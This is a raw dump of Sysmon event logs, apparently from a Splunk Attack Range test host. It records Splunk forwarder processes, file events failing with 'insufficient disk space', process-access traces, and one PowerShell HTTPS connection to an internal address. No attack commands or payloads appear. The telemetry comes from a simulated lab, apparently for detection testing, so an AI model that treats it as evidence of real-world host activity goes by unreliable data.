23542300x800000000000000035084209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:38.075{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB22ECF6AB23CC36E771D5813829544,SHA256=21CAD4F052F9D70854FEF69AED820C65CB31A32B22B34D4674B11FD4E01BFAC9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084213Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:39.090{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F395E916797AB917AC6F5A58B80480F5,SHA256=A320825B477383CCEFD53DAC41F558BCBA344477DBFA8F7606FADF19BD934673,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
354300x800000000000000035084215Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:04.192{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56580-false10.0.1.12-8000-
23542300x800000000000000035084214Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:40.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE5AE6417DA4373FF0EC84DCF3C060D2,SHA256=2972B3B85463F1D13463074A19F4E24DC7BE73D7EF91AB8C1DC9ABB3B498B8C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084216Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:41.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4429ABA09DE0A9550987223D2AE74BCA,SHA256=D21667AE512A4607226074FBD7BEA8A0A7FB9A836E422448332B5959D3275263,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084217Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:42.158{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1BD8BDC0722A3BCFDC3E5C74B6A3B3C0,SHA256=0DA1372DCD359B40159434A173892024FA8DF1F0D0F1FAA457070B7F15EA0749,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084228Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.804{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A6D6A5489D1CBBD641119C4E6C04AF7E,SHA256=3C6E2D21DDE9AF865054A700D122EA3C4C3C7C73934A159D8DAAB34E736AD47B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
10341000x800000000000000035084227Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.673{B81B27B7-4DE7-613A-3290-03000000C801}64283952C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084226Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.525{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084225Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084224Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084223Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084222Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084221Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000035084220Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.522{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
154100x800000000000000035084219Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.505{B81B27B7-4DE7-613A-3290-03000000C801}6428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
23542300x800000000000000035084218Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:43.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC87F11F2A4CA6328C34588A75C4EFA5,SHA256=DE46C6230EB9F5FF3C0C62383C8025B1444A4596EDDD5528F013E5974696D434,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
10341000x800000000000000035084250Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.925{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084246Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084245Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f
10341000x800000000000000035084244Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.923{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
154100x800000000000000035084243Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.904{B81B27B7-4DE8-613A-3490-03000000C801}332C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
354300x800000000000000035084242Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:09.259{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56582-false10.0.1.12-8000-
354300x800000000000000035084241Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:10:08.807{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56581-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https
23542300x800000000000000035084240Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.572{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8FFCAAE64BB97DEDA984B96AE98373AD,SHA256=7E57476C991BF213D7E81DAE41615281DF838137287EAF36772034D931EC5A95,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
23542300x800000000000000035084239Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.572{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B52E349A8AE58FCE1710482144C04E30,SHA256=C435CF38FFB761E109B681F1DF9FC131CF19AC0CB68959D501884F3413BA8B69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
10341000x800000000000000035084238Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.372{B81B27B7-4DE8-613A-3390-03000000C801}53446072C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23542300x800000000000000035084237Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9092033435FE34743E45FEA4FD808ECB,SHA256=5D7BA1FA024305ACB2848735B4C4C715C2898953D04A0B656CDCD20C55CFAA3A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
10341000x800000000000000035084236Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.225{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4DE8-613A-3390-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084235Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10341000x800000000000000035084234Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:09:44.223{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
